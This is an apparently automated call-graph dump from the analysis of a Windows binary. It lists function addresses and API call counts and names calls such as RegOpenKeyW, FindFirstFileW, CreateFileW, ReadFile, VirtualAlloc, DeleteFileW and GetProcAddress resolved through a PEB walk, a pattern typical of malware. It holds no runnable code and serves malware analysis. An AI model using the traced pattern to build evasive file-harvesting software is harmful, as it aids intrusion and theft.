4031e5 4 API calls 8885->8886 8887 4059ed 8886->8887 8888 402b7c 2 API calls 8887->8888 8891 405a38 8887->8891 8889 405a16 8888->8889 8890 4031e5 4 API calls 8889->8890 8889->8891 8890->8891 8891->8636 8893 4031e5 4 API calls 8892->8893 8894 4044b9 8893->8894 8894->8493 9814 40a349 9815 4098a7 13 API calls 9814->9815 9816 40a359 9815->9816 9053 408952 9074 40823f 9053->9074 9056 408960 9058 4056bf 2 API calls 9056->9058 9059 40896a 9058->9059 9102 408862 9059->9102 9061 413aca 4 API calls 9062 4089d4 9061->9062 9064 405695 2 API calls 9062->9064 9063 408975 9071 4089c4 9063->9071 9110 4087d6 9063->9110 9066 4089df 9064->9066 9071->9061 9072 402bab 2 API calls 9073 40899d 9072->9073 9073->9071 9073->9072 9075 40824d 9074->9075 9076 40831b 9075->9076 9077 4031e5 4 API calls 9075->9077 9076->9056 9090 4083bb 9076->9090 9078 40826d 9077->9078 9079 4031e5 4 API calls 9078->9079 9080 408289 9079->9080 9081 4031e5 4 API calls 9080->9081 9082 4082a5 9081->9082 9083 4031e5 4 API calls 9082->9083 9084 4082c1 9083->9084 9085 4031e5 4 API calls 9084->9085 9086 4082e2 9085->9086 9087 4031e5 4 API calls 9086->9087 9088 4082ff 9087->9088 9089 4031e5 4 API calls 9088->9089 9089->9076 9138 408363 9090->9138 9093 4056bf 2 API calls 9099 4083f4 9093->9099 9094 413aca 4 API calls 9095 4084a0 9094->9095 9096 405695 2 API calls 9095->9096 9097 4084ab 9096->9097 9097->9056 9098 408492 9098->9094 9099->9098 9141 40815d 9099->9141 9156 40805d 9099->9156 9171 404b8f 9102->9171 9104 408946 9104->9063 9105 40887e 9105->9104 9106 4031e5 4 API calls 9105->9106 9107 40893e 9105->9107 9109 402b7c 2 API calls 9105->9109 9106->9105 9174 404a39 9107->9174 9109->9105 9111 402b7c 2 API calls 9110->9111 9112 4087e7 9111->9112 9113 4031e5 4 API calls 9112->9113 9118 40885a 9112->9118 9116 408802 9113->9116 9114 408853 9115 402bab 2 API calls 9114->9115 9115->9118 9116->9114 9119 40884d 9116->9119 9183 408522 9116->9183 9187 4084b4 9116->9187 9122 408749 9118->9122 9190 4084d4 9119->9190 9123 404b8f 5 API calls 9122->9123 9127 408765 9123->9127 9124 4031e5 4 API calls 9124->9127 9125 408522 4 API calls 9125->9127 9126 4087c7 9128 404a39 5 API calls 9126->9128 9127->9124 9127->9125 9127->9126 9129 4087cf 9127->9129 9128->9129 9130 4085d1 9129->9130 9131 4085e9 9130->9131 9133 4086c2 9130->9133 9131->9133 9134 402bab 2 API calls 9131->9134 9135 4031e5 4 API calls 9131->9135 9196 4089e6 9131->9196 9215 4086c9 9131->9215 9219 4036a3 9131->9219 9133->9073 9134->9131 9135->9131 9139 4031e5 4 API calls 9138->9139 9140 408386 9139->9140 9140->9093 9140->9097 9142 40816f 9141->9142 9143 4081b6 9142->9143 9144 4081fd 9142->9144 9155 4081ef 9142->9155 9146 405872 4 API calls 9143->9146 9145 405872 4 API calls 9144->9145 9148 408213 9145->9148 9147 4081cf 9146->9147 9149 405872 4 API calls 9147->9149 9150 405872 4 API calls 9148->9150 9151 4081df 9149->9151 9152 408222 9150->9152 9153 405872 4 API calls 9151->9153 9154 405872 4 API calls 9152->9154 9153->9155 9154->9155 9155->9099 9157 40808c 9156->9157 9158 4080d2 9157->9158 9159 408119 9157->9159 9170 40810b 9157->9170 9161 405872 4 API calls 9158->9161 9160 405872 4 API calls 9159->9160 9162 40812f 9160->9162 9163 4080eb 9161->9163 9165 405872 4 API calls 9162->9165 9164 405872 4 API calls 9163->9164 9166 4080fb 9164->9166 9167 40813e 9165->9167 9168 405872 4 API calls 9166->9168 9169 405872 4 API calls 9167->9169 9168->9170 9169->9170 9170->9099 9177 404a19 9171->9177 9173 404ba0 9173->9105 9180 4049ff 9174->9180 9176 404a44 9176->9104 9178 4031e5 4 API calls 9177->9178 9179 404a2c RegOpenKeyW 9178->9179 9179->9173 9181 4031e5 4 API calls 9180->9181 9182 404a12 RegCloseKey 9181->9182 9182->9176 9185 408534 9183->9185 9184 4085af 9184->9116 9185->9184 9193 4084ee 9185->9193 9188 4031e5 4 API calls 9187->9188 9189 4084c7 9188->9189 9189->9116 9191 4031e5 4 API calls 9190->9191 9192 4084e7 9191->9192 9192->9114 9194 4031e5 4 API calls 9193->9194 9195 408501 9194->9195 9195->9184 9197 4031e5 4 API calls 9196->9197 9198 408a06 9197->9198 9199 408b21 9198->9199 9200 4031e5 4 API calls 9198->9200 9199->9131 9202 408a32 9200->9202 9201 408b17 9231 403649 9201->9231 9202->9201 9222 403666 9202->9222 9206 4031e5 4 API calls 9208 408a88 9206->9208 9209 4031e5 4 API calls 9208->9209 9214 408b0e 9208->9214 9210 408ac4 9209->9210 9211 405b6f 6 API calls 9210->9211 9212 408aff 9211->9212 9212->9214 9225 408508 9212->9225 9228 40362f 9214->9228 9216 408744 9215->9216 9217 4086e2 9215->9217 9216->9131 9217->9216 9218 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9217->9218 9218->9217 9220 4031e5 4 API calls 9219->9220 9221 4036b5 9220->9221 9221->9131 9223 4031e5 4 API calls 9222->9223 9224 403679 9223->9224 9224->9206 9224->9214 9226 4031e5 4 API calls 9225->9226 9227 40851b 9226->9227 9227->9214 9229 4031e5 4 API calls 9228->9229 9230 403642 9229->9230 9230->9201 9232 4031e5 4 API calls 9231->9232 9233 40365c 9232->9233 9233->9199 9834 40f252 9835 404bee 6 API calls 9834->9835 9836 40f269 9835->9836 9837 404bee 6 API calls 9836->9837 9848 40f2ff 9836->9848 9838 40f282 9837->9838 9839 404bee 6 API calls 9838->9839 9840 40f290 9839->9840 9851 404c4e 9840->9851 9842 40f2a7 9843 405872 4 API calls 9842->9843 9842->9848 9844 40f2cd 9843->9844 9845 405872 4 API calls 9844->9845 9846 40f2dc 9845->9846 9847 405872 4 API calls 9846->9847 9849 40f2ee 9847->9849 9850 405762 4 API calls 9849->9850 9850->9848 9852 402b7c 2 API calls 9851->9852 9854 404c60 9852->9854 9853 404ca4 9853->9842 9854->9853 9855 4031e5 4 API calls 9854->9855 9856 404c8d 9855->9856 9856->9853 9857 402bab 2 API calls 9856->9857 9857->9853 9858 41045c 9859 4040bb 12 API calls 9858->9859 9860 410477 9859->9860 9861 41060b 9860->9861 9889 407851 9860->9889 9863 41048f 9865 407851 2 API calls 9863->9865 9869 410604 9863->9869 9864 403f9e 5 API calls 9864->9861 9866 4104a9 9865->9866 9871 4105e0 9866->9871 9872 405ae9 6 API calls 9866->9872 9874 41056f 9866->9874 9875 4105eb 9866->9875 9867 402bab 2 API calls 9867->9869 9868 402bab 2 API calls 9870 4105fb 9868->9870 9869->9864 9870->9867 9873 402bab 2 API calls 9871->9873 9871->9875 9872->9866 9873->9875 9874->9871 9876 4105d6 9874->9876 9878 412269 6 API calls 9874->9878 9875->9868 9875->9870 9877 402bab 2 API calls 9876->9877 9877->9871 9879 410580 9878->9879 9879->9876 9880 405872 4 API calls 9879->9880 9881 410599 9880->9881 9882 405872 4 API calls 9881->9882 9883 4105a9 9882->9883 9884 405872 4 API calls 9883->9884 9885 4105bb 9884->9885 9886 405872 4 API calls 9885->9886 9887 4105cd 9886->9887 9888 402bab 2 API calls 9887->9888 9888->9876 9890 407866 9889->9890 9891 402b7c 2 API calls 9890->9891 9892 407899 9890->9892 9891->9892 9892->9863 9295 40f561 9298 40f4b6 9295->9298 9299 413b28 6 API calls 9298->9299 9304 40f4bf 9299->9304 9300 405b6f 6 API calls 9300->9304 9301 402bab GetProcessHeap HeapFree 9301->9304 9302 413a58 13 API calls 9302->9304 9303 40f559 9304->9300 9304->9301 9304->9302 9304->9303 9308 403b64 9309 4031e5 4 API calls 9308->9309 9310 403b77 PathFileExistsW 9309->9310 9924 40d069 9925 404bee 6 API calls 9924->9925 9926 40d080 9925->9926 9927 404bee 6 API calls 9926->9927 9948 40d1e2 9926->9948 9928 40d099 9927->9928 9929 404bee 6 API calls 9928->9929 9930 40d0a7 9929->9930 9965 404ba7 9930->9965 9933 404bee 6 API calls 9934 40d0c5 9933->9934 9935 404c4e 6 API calls 9934->9935 9936 40d0dc 9935->9936 9937 404bee 6 API calls 9936->9937 9938 40d0eb 9937->9938 9939 404ba7 4 API calls 9938->9939 9940 40d0fa 9939->9940 9941 404bee 6 API calls 9940->9941 9942 40d109 9941->9942 9943 404c4e 6 API calls 9942->9943 9944 40d123 9943->9944 9945 405872 4 API calls 9944->9945 9944->9948 9946 40d14a 9945->9946 9947 405872 4 API calls 9946->9947 9949 40d159 9947->9949 9950 405872 4 API calls 9949->9950 9951 40d16b 9950->9951 9952 405781 4 API calls 9951->9952 9953 40d179 9952->9953 9954 405872 4 API calls 9953->9954 9955 40d18b 9954->9955 9956 405762 4 API calls 9955->9956 9957 40d19f 9956->9957 9958 405872 4 API calls 9957->9958 9959 40d1b1 9958->9959 9960 405781 4 API calls 9959->9960 9961 40d1bf 9960->9961 9962 405872 4 API calls 9961->9962 9963 40d1d1 9962->9963 9964 405762 4 API calls 9963->9964 9964->9948 9966 4031e5 4 API calls 9965->9966 9967 404bca 9966->9967 9967->9933 9337 40f16e 9338 4056bf 2 API calls 9337->9338 9339 40f17b 9338->9339 9340 412093 20 API calls 9339->9340 9341 40f19e 9340->9341 9342 412093 20 API calls 9341->9342 9343 40f1b6 9342->9343 9344 412093 20 API calls 9343->9344 9345 40f1cc 9344->9345 9346 412093 20 API calls 9345->9346 9347 40f1e2 9346->9347 9348 413aca 4 API calls 9347->9348 9349 40f1ef 9348->9349 9350 405695 2 API calls 9349->9350 9351 40f1fa 9350->9351 9352 40ce71 9353 413b28 6 API calls 9352->9353 9354 40ce78 9353->9354 9355 405b6f 6 API calls 9354->9355 9357 40ce83 9355->9357 9356 403fbf 7 API calls 9358 40cecc 9356->9358 9360 40ceba 9357->9360 9361 403d74 19 API calls 9357->9361 9365 40cec1 9357->9365 9359 40cefb 9358->9359 9363 403d74 19 API calls 9358->9363 9362 402bab 2 API calls 9360->9362 9364 40cead 9361->9364 9362->9365 9366 40cee7 9363->9366 9364->9360 9369 402bab 2 API calls 9364->9369 9365->9356 9367 40cef4 9366->9367 9370 402bab 2 API calls 9366->9370 9368 402bab 2 API calls 9367->9368 9368->9359 9369->9360 9370->9367 9371 406472 9372 4031e5 4 API calls 9371->9372 9373 406484 Sleep 9372->9373 10041 40f204 10042 405781 4 API calls 10041->10042 10043 40f214 10042->10043 10044 4057df 13 API calls 10043->10044 10045 40f226 10044->10045 9431 403c08 9432 4031e5 4 API calls 9431->9432 9433 403c1a DeleteFileW 9432->9433 9434 410a09 9435 41219c 14 API calls 9434->9435 9436 410a1b 9435->9436 9437 41219c 14 API calls 9436->9437 9438 410a23 9437->9438 9439 41219c 14 API calls 9438->9439 9440 410a2c 9439->9440 9441 41219c 14 API calls 9440->9441 9442 410a38 9441->9442 9443 404b22 6 API calls 9442->9443 9444 410a4c 9443->9444 9445 410a7a 9444->9445 9446 403fbf 7 API calls 9444->9446 9447 410a5c 9446->9447 9448 410a71 9447->9448 9449 413a58 13 API calls 9447->9449 9450 402bab 2 API calls 9448->9450 9451 410a6b 9449->9451 9450->9445 9452 402bab 2 API calls 9451->9452 9452->9448 10046 410d09 10047 410d56 10046->10047 10048 410d17 10046->10048 10050 413a58 13 API calls 10047->10050 10062 406642 10048->10062 10052 410d6f 10050->10052 10053 4056bf 2 API calls 10054 410d2e 10053->10054 10075 405641 10054->10075 10056 410d41 10057 413aca 4 API calls 10056->10057 10058 410d4a 10057->10058 10059 405695 2 API calls 10058->10059 10060 410d50 10059->10060 10061 4036a3 4 API calls 10060->10061 10061->10047 10063 406662 10062->10063 10064 4031e5 4 API calls 10063->10064 10065 406676 10064->10065 10079 4066bf 10065->10079 10070 4066b1 10073 4036a3 4 API calls 10070->10073 10071 4066a7 10072 4036a3 4 API calls 10071->10072 10074 4066ac 10072->10074 10073->10074 10074->10047 10074->10053 10076 40564d 10075->10076 10077 405673 10075->10077 10076->10077 10078 4056fc 4 API calls 10076->10078 10077->10056 10078->10077 10080 4031e5 4 API calls 10079->10080 10081 4066dc 10080->10081 10082 4066f6 SetLastError 10081->10082 10083 406708 GetLastError 10081->10083 10093 406693 10082->10093 10084 406713 10083->10084 10083->10093 10085 4031e5 4 API calls 10084->10085 10086 406725 10085->10086 10087 4031e5 4 API calls 10086->10087 10086->10093 10088 40673f 10087->10088 10089 406753 10088->10089 10090 406749 10088->10090 10092 4031e5 4 API calls 10089->10092 10091 4036a3 4 API calls 10090->10091 10091->10093 10094 406761 10092->10094 10101 406455 10093->10101 10095 40678a 10094->10095 10096 40677c 10094->10096 10098 4036a3 4 API calls 10095->10098 10097 4036a3 4 API calls 10096->10097 10099 406781 10097->10099 10098->10093 10100 4036a3 4 API calls 10099->10100 10100->10093 10102 4031e5 4 API calls 10101->10102 10103 406468 10102->10103 10103->10070 10103->10071 9453 40c509 9454 412093 20 API calls 9453->9454 9455 40c51e 9454->9455 9462 40910d 9463 404b22 6 API calls 9462->9463 9464 409124 9463->9464 9465 40917a 9464->9465 9466 405b6f 6 API calls 9464->9466 9467 40913e 9466->9467 9469 404b22 6 API calls 9467->9469 9474 409173 9467->9474 9468 402bab 2 API calls 9468->9465 9470 409153 9469->9470 9471 40916a 9470->9471 9473 409408 15 API calls 9470->9473 9472 402bab 2 API calls 9471->9472 9472->9474 9475 409164 9473->9475 9474->9468 9476 402bab 2 API calls 9475->9476 9476->9471 9480 410410 9481 4056bf 2 API calls 9480->9481 9482 41041b 9481->9482 9483 412093 20 API calls 9482->9483 9484 41043c 9483->9484 9485 413aca 4 API calls 9484->9485 9486 410449 9485->9486 9487 405695 2 API calls 9486->9487 9488 410454 9487->9488 9515 40c71a 9516 41219c 14 API calls 9515->9516 9517 40c728 9516->9517 10159 410b1a 10160 404bee 6 API calls 10159->10160 10162 410b31 10160->10162 10161 410c6d 10162->10161 10163 404bee 6 API calls 10162->10163 10164 410b5a 10163->10164 10165 404bee 6 API calls 10164->10165 10166 410b69 10165->10166 10167 404bee 6 API calls 10166->10167 10168 410b78 10167->10168 10169 404ba7 4 API calls 10168->10169 10170 410b86 10169->10170 10171 404ba7 4 API calls 10170->10171 10172 410b95 10171->10172 10172->10161 10173 405872 4 API calls 10172->10173 10174 410bd7 10173->10174 10175 405872 4 API calls 10174->10175 10176 410be8 10175->10176 10177 405872 4 API calls 10176->10177 10178 410bf9 10177->10178 10179 405781 4 API calls 10178->10179 10180 410c07 10179->10180 10181 405781 4 API calls 10180->10181 10185 410c15 10181->10185 10182 410c4e 10183 405762 4 API calls 10182->10183 10184 410c60 10183->10184 10184->10161 10186 403f9e 5 API calls 10184->10186 10185->10182 10192 405e5a 10185->10192 10186->10161 10189 4040bb 12 API calls 10190 410c44 10189->10190 10191 402bab 2 API calls 10190->10191 10191->10182 10193 402b7c 2 API calls 10192->10193 10194 405e72 10193->10194 10195 4031e5 4 API calls 10194->10195 10198 405ea3 10194->10198 10196 405e94 10195->10196 10197 402bab 2 API calls 10196->10197 10196->10198 10197->10198 10198->10182 10198->10189 10199 40f81c 10200 404bee 6 API calls 10199->10200 10201 40f833 10200->10201 10202 404bee 6 API calls 10201->10202 10216 40f94f 10201->10216 10203 40f85c 10202->10203 10204 404bee 6 API calls 10203->10204 10205 40f86b 10204->10205 10206 404bee 6 API calls 10205->10206 10207 40f87a 10206->10207 10208 404bee 6 API calls 10207->10208 10209 40f888 10208->10209 10210 404ba7 4 API calls 10209->10210 10211 40f897 10210->10211 10212 405872 4 API calls 10211->10212 10211->10216 10213 40f8d8 10212->10213 10214 405872 4 API calls 10213->10214 10215 40f8ea 10214->10215 10217 405872 4 API calls 10215->10217 10218 40f8fa 10217->10218 10219 405872 4 API calls 10218->10219 10220 40f90c 10219->10220 10221 405781 4 API calls 10220->10221 10222 40f91d 10221->10222 10223 4040bb 12 API calls 10222->10223 10224 40f92d 10223->10224 10225 405762 4 API calls 10224->10225 10226 40f93f 10225->10226 10226->10216 10227 403f9e 5 API calls 10226->10227 10227->10216 9530 402c1f 9531 4031e5 4 API calls 9530->9531 9532 402c31 LoadLibraryW 9531->9532 10237 407e1f 10238 407e2c 10237->10238 10247 407e61 10237->10247 10241 407e3e 10238->10241 10242 402bab 2 API calls 10238->10242 10245 407e51 10238->10245 10239 407eb6 10239->10245 10246 402bab 2 API calls 10239->10246 10240 407ed4 10241->10240 10244 402bab 2 API calls 10241->10244 10242->10241 10243 402bab 2 API calls 10243->10239 10244->10245 10245->10240 10248 402bab 2 API calls 10245->10248 10246->10245 10247->10239 10249 405872 4 API calls 10247->10249 10254 407ea6 10247->10254 10248->10240 10250 407e86 10249->10250 10251 405872 4 API calls 10250->10251 10252 407e96 10251->10252 10253 405872 4 API calls 10252->10253 10253->10254 10254->10239 10254->10243 9545 405924 9546 4031e5 4 API calls 9545->9546 9547 405937 StrStrW 9546->9547 10263 410927 10264 4044ee 7 API calls 10263->10264 10265 41093d 10264->10265 10266 4109a4 10265->10266 10267 4056bf 2 API calls 10265->10267 10270 410954 10267->10270 10268 4044ee 7 API calls 10268->10270 10270->10268 10271 402bab 2 API calls 10270->10271 10272 410990 10270->10272 10278 41080e 10270->10278 10271->10270 10273 413aca 4 API calls 10272->10273 10274 410998 10273->10274 10275 405695 2 API calls 10274->10275 10276 41099e 10275->10276 10277 402bab 2 API calls 10276->10277 10277->10266 10279 410821 10278->10279 10289 41091f 10279->10289 10290 410701 10279->10290 10282 405872 4 API calls 10283 410900 10282->10283 10284 405872 4 API calls 10283->10284 10285 41090d 10284->10285 10286 405872 4 API calls 10285->10286 10287 410919 10286->10287 10288 402bab 2 API calls 10287->10288 10288->10289 10289->10270 10291 405f08 4 API calls 10290->10291 10293 410713 10291->10293 10292 410804 10292->10282 10292->10289 10293->10292 10294 402b7c 2 API calls 10293->10294 10295 410748 10294->10295 10297 402b7c 2 API calls 10295->10297 10299 4107fd 10295->10299 10296 402bab 2 API calls 10296->10292 10300 4107ad 10297->10300 10298 402bab 2 API calls 10298->10299 10299->10296 10300->10298 10301 40d726 10302 404bee 6 API calls 10301->10302 10303 40d73f 10302->10303 10304 40db63 10303->10304 10305 405872 4 API calls 10303->10305 10308 40d761 10305->10308 10306 404bee 6 API calls 10306->10308 10307 405872 4 API calls 10307->10308 10308->10306 10308->10307 10310 40d971 10308->10310 10309 404ba7 4 API calls 10309->10310 10310->10309 10311 405781 4 API calls 10310->10311 10313 40d9bb 10310->10313 10311->10310 10312 404c4e 6 API calls 10312->10313 10313->10304 10313->10312 10314 405781 4 API calls 10313->10314 10315 4037be 4 API calls 10313->10315 10316 405872 4 API calls 10313->10316 10314->10313 10315->10313 10316->10313 9603 40f12f 9604 41219c 14 API calls 9603->9604 9605 40f13f 9604->9605 9606 41219c 14 API calls 9605->9606 9607 40f14c 9606->9607 9608 41219c 14 API calls 9607->9608 9609 40f159 9608->9609 9610 41219c 14 API calls 9609->9610 9611 40f166 9610->9611 9618 40ed35 9619 4056bf 2 API calls 9618->9619 9620 40ed42 9619->9620 9621 412093 20 API calls 9620->9621 9622 40ed63 9621->9622 9623 412093 20 API calls 9622->9623 9624 40ed73 9623->9624 9625 413aca 4 API calls 9624->9625 9626 40ed80 9625->9626 9627 405695 2 API calls 9626->9627 9628 40ed8e 9627->9628 8072 40f3c5 8077 41219c 8072->8077 8075 41219c 14 API calls 8076 40f3e1 8075->8076 8078 4121b1 8077->8078 8093 40f3d3 8077->8093 8079 4121be 8078->8079 8083 4121c5 8078->8083 8125 413ba4 8079->8125 8080 4121ca 8095 404056 8080->8095 8083->8080 8087 412210 8083->8087 8084 4121c3 8084->8093 8102 405b6f 8084->8102 8087->8093 8130 403fbf 8087->8130 8088 41224d 8090 402bab 2 API calls 8088->8090 8088->8093 8090->8093 8093->8075 8141 402b7c GetProcessHeap RtlAllocateHeap 8095->8141 8097 404066 8099 404095 8097->8099 8143 4031e5 8097->8143 8099->8084 8101 402bab 2 API calls 8101->8099 8103 405b7d 8102->8103 8104 402b7c 2 API calls 8103->8104 8105 405b99 8104->8105 8114 405c02 8105->8114 8179 4059b8 8105->8179 8107 405c09 8109 402bab 2 API calls 8107->8109 8108 405bba 8108->8107 8110 402b7c 2 API calls 8108->8110 8109->8114 8111 405bdd 8110->8111 8111->8107 8112 405be4 8111->8112 8113 402bab 2 API calls 8112->8113 8113->8114 8114->8088 8115 413a58 8114->8115 8116 413a63 8115->8116 8124 412245 8115->8124 8116->8124 8182 405781 8116->8182 8119 405781 4 API calls 8120 413aa0 8119->8120 8185 4057df 8120->8185 8123 405781 4 API calls 8123->8124 8138 402bab 8124->8138 8126 413bad 8125->8126 8127 404056 6 API calls 8126->8127 8129 413bb8 8126->8129 8128 413bc5 8127->8128 8128->8084 8129->8084 8131 402b7c 2 API calls 8130->8131 8132 403fcf 8131->8132 8133 403ff4 8132->8133 8304 403b98 8132->8304 8133->8084 8136 403ff8 GetLastError 8137 402bab 2 API calls 8136->8137 8137->8133 8139 402bb4 GetProcessHeap HeapFree 8138->8139 8140 402bc6 8138->8140 8139->8140 8140->8088 8142 402b98 8141->8142 8142->8097 8144 4031f3 8143->8144 8145 403236 8143->8145 8144->8145 8148 403208 8144->8148 8154 4030a5 8145->8154 8147 403224 8150 403258 8147->8150 8152 4031e5 4 API calls 8147->8152 8160 403263 8148->8160 8150->8099 8150->8101 8151 40320d 8151->8150 8153 4030a5 4 API calls 8151->8153 8152->8150 8153->8147 8166 402ca4 8154->8166 8156 4030b0 8157 4030b5 8156->8157 8170 4030c4 8156->8170 8157->8147 8161 40326d 8160->8161 8162 402b7c 2 API calls 8161->8162 8165 4032b7 8161->8165 8163 40328c 8162->8163 8164 402b7c 2 API calls 8163->8164 8164->8165 8165->8151 8167 403079 8166->8167 8169 40307c 8167->8169 8174 40317b GetPEB 8167->8174 8169->8156 8173 4030eb 8170->8173 8171 4030c0 8171->8147 8173->8171 8176 402c03 8173->8176 8175 40319b 8174->8175 8175->8169 8177 4031e5 3 API calls 8176->8177 8178 402c15 GetProcAddress 8177->8178 8178->8171 8180 4031e5 4 API calls 8179->8180 8181 4059cb 8180->8181 8181->8108 8200 405797 8182->8200 8184 405792 8184->8119 8186 405832 8185->8186 8187 4057eb 8185->8187 8186->8123 8186->8124 8187->8186 8210 4040bb 8187->8210 8190 405839 8192 405853 8190->8192 8237 405627 8190->8237 8191 40582c 8234 403f9e 8191->8234 8248 405762 8192->8248 8198 403f9e 5 API calls 8198->8186 8201 4057a1 8200->8201 8202 4057bd 8200->8202 8201->8202 8204 4056fc 8201->8204 8202->8184 8205 405714 8204->8205 8206 402b7c 2 API calls 8205->8206 8207 405730 8206->8207 8208 402bab 2 API calls 8207->8208 8209 405752 8207->8209 8208->8209 8209->8202 8211 4031e5 4 API calls 8210->8211 8212 4040d5 CreateFileW 8211->8212 8213 4040f8 8212->8213 8214 40418d 8212->8214 8215 4031e5 4 API calls 8213->8215 8216 404183 8214->8216 8254 403c90 8214->8254 8222 404105 8215->8222 8216->8186 8216->8190 8216->8191 8220 40416d 8251 403c40 8220->8251 8222->8220 8226 4031e5 4 API calls 8222->8226 8224 4040bb 9 API calls 8227 4041c8 8224->8227 8225 402bab 2 API calls 8225->8216 8228 404131 VirtualAlloc 8226->8228 8227->8225 8228->8220 8229 404142 8228->8229 8230 4031e5 4 API calls 8229->8230 8231 40414f ReadFile 8230->8231 8231->8220 8232 404160 8231->8232 8233 4031e5 4 API calls 8232->8233 8233->8220 8235 4031e5 4 API calls 8234->8235 8236 403fb1 VirtualFree 8235->8236 8236->8186 8238 4031e5 4 API calls 8237->8238 8239 40563a 8238->8239 8240 405872 8239->8240 8242 405881 8240->8242 8241 4058bc 8243 405797 4 API calls 8241->8243 8245 4058af 8241->8245 8242->8241 8301 4058d4 8242->8301 8243->8245 8245->8192 8247 405781 4 API calls 8247->8241 8249 405781 4 API calls 8248->8249 8250 405770 8249->8250 8250->8198 8252 4031e5 4 API calls 8251->8252 8253 403c52 FindCloseChangeNotification 8252->8253 8253->8216 8255 403ca3 8254->8255 8258 403caa 8254->8258 8281 405dc5 8255->8281 8257 404056 6 API calls 8259 403cbe 8257->8259 8258->8257 8260 403d3a 8258->8260 8261 403d2e 8259->8261 8262 403d17 8259->8262 8263 403ccf 8259->8263 8260->8216 8277 403c59 8260->8277 8261->8260 8265 402bab 2 API calls 8261->8265 8266 405b6f 6 API calls 8262->8266 8264 405b6f 6 API calls 8263->8264 8268 403cdd 8264->8268 8265->8260 8267 403d14 8266->8267 8270 402bab 2 API calls 8267->8270 8269 405b6f 6 API calls 8268->8269 8271 403cee 8269->8271 8270->8261 8271->8267 8286 403d4d 8271->8286 8274 403d0b 8276 402bab 2 API calls 8274->8276 8276->8267 8278 403c21 8277->8278 8279 4031e5 4 API calls 8278->8279 8280 403c33 8279->8280 8280->8224 8280->8227 8295 406799 8281->8295 8283 405dd5 8284 402b7c 2 API calls 8283->8284 8285 405dfe 8284->8285 8285->8258 8298 403bb7 8286->8298 8288 403cfe 8288->8274 8289 403c62 8288->8289 8290 403d4d 5 API calls 8289->8290 8291 403c6d 8290->8291 8292 403c72 8291->8292 8293 4031e5 4 API calls 8291->8293 8292->8274 8294 403c87 CreateDirectoryW 8293->8294 8294->8274 8296 4031e5 4 API calls 8295->8296 8297 4067ad 8296->8297 8297->8283 8299 4031e5 4 API calls 8298->8299 8300 403bc9 GetFileAttributesW 8299->8300 8300->8288 8302 405797 4 API calls 8301->8302 8303 4058a8 8302->8303 8303->8245 8303->8247 8305 4031e5 4 API calls 8304->8305 8306 403baa 8305->8306 8306->8133 8306->8136 9743 40ebc6 9744 4040bb 12 API calls 9743->9744 9745 40ebdf 9744->9745 9746 40ecd7 9745->9746 9763 407795 9745->9763 9749 40eccd 9751 403f9e 5 API calls 9749->9751 9750 4056bf 2 API calls 9761 40ec12 9750->9761 9751->9746 9752 40ecb5 9753 402bab 2 API calls 9752->9753 9754 40ecbd 9753->9754 9755 413aca 4 API calls 9754->9755 9756 40ecc7 9755->9756 9757 405695 2 API calls 9756->9757 9757->9749 9758 407908 GetProcessHeap RtlAllocateHeap 9758->9761 9760 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9760->9761 9761->9752 9761->9758 9761->9760 9762 402bab GetProcessHeap HeapFree 9761->9762 9774 412269 9761->9774 9762->9761 9765 4077ab 9763->9765 9764 4077b3 9764->9749 9764->9750 9765->9764 9781 405ae9 9765->9781 9767 4077e1 9767->9764 9768 407802 9767->9768 9769 4077f8 9767->9769 9771 402b7c 2 API calls 9768->9771 9770 402bab 2 API calls 9769->9770 9770->9764 9772 407811 9771->9772 9773 402bab 2 API calls 9772->9773 9773->9764 9797 40374e 9774->9797 9777 412299 9777->9761 9780 402bab 2 API calls 9780->9777 9782 405af7 9781->9782 9783 402b7c 2 API calls 9782->9783 9784 405b03 9783->9784 9793 405b5a 9784->9793 9794 405998 9784->9794 9786 405b21 9787 405b61 9786->9787 9789 402b7c 2 API calls 9786->9789 9788 402bab 2 API calls 9787->9788 9788->9793 9790 405b39 9789->9790 9790->9787 9791 405b40 9790->9791 9792 402bab 2 API calls 9791->9792 9792->9793 9793->9767 9795 4031e5 4 API calls 9794->9795 9796 4059ab 9795->9796 9796->9786 9798 402b7c 2 API calls 9797->9798 9799 40375f 9798->9799 9800 4031e5 4 API calls 9799->9800 9803 4037a3 9799->9803 9801 40378f 9800->9801 9802 402bab 2 API calls 9801->9802 9801->9803 9802->9803 9803->9777 9804 4037be 9803->9804 9805 4031e5 4 API calls 9804->9805 9806 4037e2 9805->9806 9807 40382b 9806->9807 9808 402b7c 2 API calls 9806->9808 9807->9780 9809 403802 9808->9809 9810 403832 9809->9810 9812 403809 9809->9812 9811 4036a3 4 API calls 9810->9811 9811->9807 9813 4036a3 4 API calls 9812->9813 9813->9807 8904 410cd1 8909 412093 8904->8909 8907 412093 20 API calls 8908 410cff 8907->8908 8911 4120a5 8909->8911 8930 410cf1 8909->8930 8910 4120b3 8912 404056 6 API calls 8910->8912 8911->8910 8916 412100 8911->8916 8913 4120ba 8912->8913 8914 405b6f 6 API calls 8913->8914 8915 412152 8913->8915 8913->8930 8918 412125 8914->8918 8931 403d74 8915->8931 8917 403fbf 7 API calls 8916->8917 8916->8930 8917->8913 8918->8915 8922 412139 8918->8922 8923 41214d 8918->8923 8921 41218c 8925 402bab 2 API calls 8921->8925 8921->8930 8927 402bab 2 API calls 8922->8927 8926 402bab 2 API calls 8923->8926 8924 402bab 2 API calls 8924->8921 8925->8930 8926->8915 8928 41213e 8927->8928 8929 402bab 2 API calls 8928->8929 8929->8930 8930->8907 8932 403d87 8931->8932 8933 403ea3 8932->8933 8934 405b6f 6 API calls 8932->8934 8935 405b6f 6 API calls 8933->8935 8936 403da3 8934->8936 8937 403eb9 8935->8937 8936->8933 8938 4031e5 4 API calls 8936->8938 8939 4031e5 4 API calls 8937->8939 8945 403f6f 8937->8945 8941 403dbc FindFirstFileW 8938->8941 8940 403ed3 FindFirstFileW 8939->8940 8957 403f8d 8940->8957 8961 403ee8 8940->8961 8952 403e9c 8941->8952 8962 403dd1 8941->8962 8942 402bab 2 API calls 8942->8945 8943 402bab 2 API calls 8943->8933 8944 4031e5 4 API calls 8946 403e84 FindNextFileW 8944->8946 8945->8921 8945->8924 8947 403e96 8946->8947 8946->8962 8971 403bef 8947->8971 8948 4031e5 4 API calls 8951 403f50 FindNextFileW 8948->8951 8950 405b6f 6 API calls 8950->8961 8954 403f87 8951->8954 8951->8961 8952->8943 8953 405b6f 6 API calls 8953->8962 8956 403bef 5 API calls 8954->8956 8955 403f75 8958 402bab 2 API calls 8955->8958 8956->8957 8957->8942 8960 